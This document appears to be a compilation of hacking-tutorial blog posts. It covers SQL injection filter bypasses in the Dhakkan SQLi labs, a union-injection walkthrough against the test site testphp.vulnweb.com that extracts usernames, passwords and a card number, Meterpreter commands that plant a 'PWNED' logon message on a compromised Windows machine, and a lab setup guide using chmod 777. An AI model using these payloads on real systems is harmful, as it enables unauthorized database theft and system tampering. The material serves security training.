How to Bypass Filter in SQL Injection Manually

In previous article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. The reason behind that is the protection that developer had applied to prevent SQL injection, sometimes developer use filters to strip out few characters and OPERATORS from the user input before adding it to the query for SQL statement to prevent SQL Injection. Today’s article will help you to face such situations and will tell you how to bypass such filters. Here again we’ll be using DHAKKAN SQLI labs for practice.

Let’s start!!

LESSION 25

In Lab 25 OR and AND function are Blocked here we will try to bypass sql filter using their substitute.

function blacklist($id)

$id= preg_replace('/or/i',"", $id);                              //strip out OR (non case sensitive)

$id= preg_replace('/AND/i',"", $id);                         //Strip out AND (non case sensitive)

Since alphabetic word OR, AND are blacklisted, hence if we use AND 1=1 and OR 1=1 there would be no output therefore I had use %26%26 inside the query.

 Following are replacement for AND and OR

AND :   &&   %26%26 

OR  :  || 

Open the browser and type following SQL query  in URL

http://localhost:81/sqli/Less-25/?id=1' %26%26 1=1 --+

From screenshot you can see we have successfully fixed the query for AND (&&) into URL encode as %26%26. Even when AND operator was filtered out.

Once the concept is clear to bypass AND filter later we need to alter the               SQL statement for retrieving database information.

http://localhost:81//sqli/Less-25/?id=-1' union select 1,2,3 %26%26 1=1 --+

Type following query to retrieve database name using union injection

http://localhost:81/sqli/Less-25/?id=-1' union select 1,database(),3 %26%26 1=1 --+

hence you can see we have successfully get securtiy as database name as result.

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %26%26 1=1 --+

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %26%26 1=1 --+

Hence you can see it contains 4 columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(username),3 from users --+

From screenshot you can read the fetched data.

Hence in lesson 25 we have learn how to bypass AND, OR filter for retrieving information inside the database.

LESSION 26

You will find lab 26 more challenging because here space,Comments,OR and AND are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)

preg_replace('/or/i',"", $id);                                       //strip out OR (non case sensitive)

$id= preg_replace('/and/i',"", $id);                          //Strip out AND (non case sensitive)

$id= preg_replace('/[\/\*]/',"", $id);                       //strip out /*

$id= preg_replace('/[--]/',"", $id);                            //Strip out --

$id= preg_replace('/[#]/',"", $id);                             //Strip out #

$id= preg_replace('/[\s]/',"", $id);                            //Strip out spaces

$id= preg_replace('/[\/\\\\]/',"", $id);    //Strip out slashes

This lab has more filters as compared to lab 25  because here space,Comments are also Blocked. Now execute following query In URL .

http://localhost:81/sqli/Less-26/?id=1'%a0%26%26'1=1

From screenshot you can see we have successfully fixed the query for SPACE into URL encode as %a0

Blanks = ('%09', '%0A', '%0C', '%0D', '%0B' '%a0')

Once the concept is clear to bypass AND, OR and SPACE filter later we need to alter the                SQL statement for retrieving database information.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,2,3%a0%26%26'1=1

Type following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,database(),3%a0%26%26'1=1

Hence you can see we have successfully get securtiy as database name as result

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0%26%26'1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0%26%26'1=1

Hence you can see columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

From screenshot you can read the fetched data.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0'1

Hence in lesson 26 we have learned how to bypass AND, OR, SPACE AND COMMENT filter for retrieving information from the database.

LESSON 27

You will find this lab even more challenging because here UNION/union, SELECT/select, SPACE and Comments are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)

$id= preg_replace('/[\/\*]/',"", $id);                       //strip out /*

$id= preg_replace('/[--]/',"", $id);                            //Strip out --.

$id= preg_replace('/[#]/',"", $id);                                             //Strip out #.

$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.

$id= preg_replace('/select/m',"", $id);       //Strip out spaces.

$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.

$id= preg_replace('/union/s',"", $id);         //Strip out union

$id= preg_replace('/select/s',"", $id);         //Strip out select

$id= preg_replace('/UNION/s',"", $id);      //Strip out UNION

$id= preg_replace('/SELECT/s',"", $id);       //Strip out SELECT

$id= preg_replace('/Union/s',"", $id);         //Strip out Union

$id= preg_replace('/Select/s',"", $id);         //Strip out select

This lab has more filters in addtion to lab 26  because here union, select, space andComments are also Blocked. Now execute following query In URL .

http://localhost:81/sqli/Less-27/?id=1' AND'1=1

Once the concept is clear to bypass UNION/union, SELECT/select and SPACE filter later we need to alter the SQL statement for retrieving database information.

http://localhost:81/sqli/Less-27/?id=1'%a0UnIon%a0SeLect%a01,2,3%a0AND'1=1

 In screenshot you can see I have use union as UnIon and select as SeLect in query to bypass the filter.

Now Type following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,database(),3%a0AND'1=1

Hence you can see we have successfully get securtiy as database name as result

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0AND'1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0AND'1=1

Hence you can see columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

From screenshot you can read the fetched data.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0'1

Hence in lesson 27 we have learned how to bypass UNION/union, SELECT/select, SPACE and COMMENT filter for retrieving information inside the database.

Manual SQL Injection Exploitation Step by Step

This article is based on our previous article where you have learned different techniques to perform SQL injection manually using dhakkan. Today we are again performing SQL injection manually on a live website “vulnweb.com” in order to reduce your stress of installing setup of dhakkan.

We are going to apply same concept and techniques as performed in Dhakkan on different the platform

 Let’s begin!

Open given below targeted URL in the browser

http://testphp.vulnweb.com/artist.php?artist=1 So here we are going test SQL injection for “id=1

Now use error base technique by adding an apostrophe (‘) symbol at the end of input which will try to break the query.

http://testphp.vulnweb.com/artist.php?artist=1’

In the given screenshot you can see we have got error message which means the running site is infected by SQL injection.

Now using ORDER BY keyword to sort the records in ascending or descending order for id=1

http://testphp.vulnweb.com/artist.php?artist=1 order by 1

Similarly repeating for order 2, 3 and so on one by one

http://testphp.vulnweb.com/artist.php?artist=1 order by 2

http://testphp.vulnweb.com/artist.php?artist=1 order by 4

From screenshot you can see we have got error at order by 4 which means it consist only three records.

Let’s penetrate more inside using union base injection to select statement from different table.

http://testphp.vulnweb.com/artist.php?artist=1 union select 1,2,3

 From screenshot you can see it is show result for only one table not for others.

Now try to pass wrong input into database through URL by replacing artist=1 from artist=-1 as given below:

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,2,3

Hence you can see now it is showing the result for remaining two tables also.

Use next query to fetch the name of database

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,database(),3

From screen shot you can read the database name acuart

Next query will extract current username as well as version of database system

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,version(),cuurent_user()

Here we have retrieve 5.1.73 0ubuntu0 10.04.1 as version and acuart@localhost as current user

Through next query we will try to fetch table name inside the database

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1

from screenshot you can name of first table is carts.

Similarly repeat the same query for another table with slight change

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1

We got table 2: categ

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1

We got table 3: featured

Similarly repeat same query for table 4, 5, 6, and 7 with making slight changes in LIMIT.

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 7,1

We got table 7: users

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 8,1

Since we didn’t get anything when limit is set 8, 1 hence their might be 7 tables only inside the database.

concat function is use for concatenation of two or more string into single string.

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

From screen you can see through concat function we have successfully retrieve all table name inside the

database.

Table1: artist

Table2: Carts

Table3: Featured

Table4: Guestbook

Table5: Pictures

Table6: Product

Table7: users

May be we can get some important data from users table, so let’s penetrate more inside.  Again Use concat function for table users for retrieving its entire column names.

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(column_name),3 from users

Awesome!!  We successfully retrieve all eight column names from inside the table users.

Then I have choose only four column i.e. uname, pass,email and cc for further enumeration.

Use concat function for selecting uname from table users by executing following query through URL

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(uname),3 from users

From screenshot you can read uname: test

Use concat function for selecting pass from table users by executing following query through URL

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(pass),3 from users

From screenshot you can read pass: test

Use concat function for selecting cc (credit card) from table users by executing following query through URL

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(cc),3 from users

From screenshot you can read cc: 1234-5678-2300-9000

Use concat function for selecting email from table users by executing following query through URL

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(email),3 from users

From screenshot you can read email: jitendra@panalinks.com

 Enjoy hacking!!

Hack Legal Notice Caption of Remote PC

Registry key play an important role in operating system attacker makes use of legal notice registry key to send threaten message on targeted system so that once the system is boot up the user can read the message that “your system has been hacked” which appears before login screen.

Through this article we are showing how an attacker sends threaten message on logon screen to the targeted users.

Let’s start

Attacker : Kali Linux

Target: window 7

Read our previous article how to hack windows 7 and get meterpreter session of victims, inside meterpreter there are so many options for post exploit now type following command to move inside registry key of the victim’s system

Meterpreter > Reg enumkey –k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System

From screenshot you can observe that it contains 2 keys (Audit, UIPI) having 18 different values. The highlighting box is our targeted value.

i)                    Legalnoticecaption

ii)                   legalnoticetext

Now type another command for assigning the value of legalnoticecaption which is use for providing the title or heading of the given message on logon screen.

Meterpreter > Reg enumkey –k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System –v legalnoticecaption –d “IMPORTANT MESSAGE”

From screenshot you can read our registry key is successfully set.

Now type one more command for giving warning message to the targeted system by assigning value of legalnoticetext which will display your message on logon screen of victim’s system.

Meterpreter > Reg enumkey –k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System –v legalnoticetext –d “PWNED BY RAJ CHANDEL”

From screenshot you can read again our registry key is successfully set.

Here –k denote key; -V denote value; -d denote input data.

Now when the victim will start his system after then he will receive our message on logon screen as shown in given screenshot.

Try it yourself!!!

How to set up SQLI Lab in in Kali

Hello everyone, with the joy of having new kali version somewhere few of us are having hard time in setting Dhakkan (AUDI-1) sql series lab in our kali machine.

So today we’ll be learning how to setup Dhakkan lab (one of the best labs I have seen for practicing and understanding SQL INJECTION) in our latest kali machine.

Download from here

Q - Why it is not as simple as it was in older version of kali?

Ans- In latest version of kali we are having PHP version 7.xxx which does not support MySQL functions because it support MySQLi functions.

MySQLi Extension (or simply known as MySQL improved or MySQLi) is a relational database driver that is used mainly in the PHP programming language. 

So we have 2 ways to set up

1-      Degrade your PHP version to 5.xx

2-      Change code of original Dhakkan lab to make it work with latest kali.

We’ll change code of labs.

Q- How I came to know that this is the issue?

Ans – When I set up my lab and browse it from my browser I saw I was unable to set up database required, See below screenshot

In the above screenshot see the URL .So now I know something is wrong in setup-db.php so I tried to run this specific file in my kali, see screenshot

So after googling the error I came to know I have to replace mysql_connect() with mysqli_connect()

After making this change when I run setup.php again I came across new error, see screenshot

So I replace mysql_query($sql) with mysqli_query($con, $sql)

($con is the connection link we made to our database) if you don’t know php don’t worry simply replace mysql_query($sql) with mysqli_query($con, $sql)

So this is how I debug the issue.

Now I am summarizing the changes that I made and you have to do to set up your lab.

Simply use Ctrl+F and replace all feature to make changes at a fast pace.

You have to make changes in index.php of ALL lessons, other php files in lessons and in all php files present in sql-connections Folder.

(Or you can contact me to get the edited lab)

S.No	Replace	Replace By
1	mysql_query($sql)	mysqli_query($con, $sql)
2	mysql_error()	mysqli_error($con)
3	mysql_fetch_array($result)	mysqli_fetch_array($result, MYSQLI_BOTH)
4	mysql_fetch_array($result1)	mysqli_fetch_array($result1, MYSQLI_BOTH)
5	mysql_connect($host,$dbuser,$dbpass)	mysqli_connect($host,$dbuser,$dbpass)
6	mysql_real_escape_string($value)	mysqli_real_escape_string($con, $value)
7	mysql_select_db($dbname, $con)	mysqli_select_db($con, $dbname)

After making the above changes copy complete sqli-labs folder in /var/www/html folder of kali

 Now open kali terminal and move to this folder using command “cd /var/www/html”

Now give permissions to sqlilabs folder using command “chmod 777 sqlilabs”

Now move to sqlilabs folder using command “cd sqlilabs” And give permissions to all files and folder in it using command “chmod 777 *”

Now your lab is ready to use you can access you lab using your browser Ip of your kali machine/sqlilabs

Click on Setup/reset Database for labs

Database set now practice and enjoy and use you skill to help organizations in securing their apps and applications from hackers. Don’t test it on sites for which you don’t have written permission to do so. It is illegal you may end up going behind the bars and ruin your career.

We are very thankful to Audi-1(aka Dhakkan) for creating such an interesting and awesome environment for us to understand and practice SQL injection.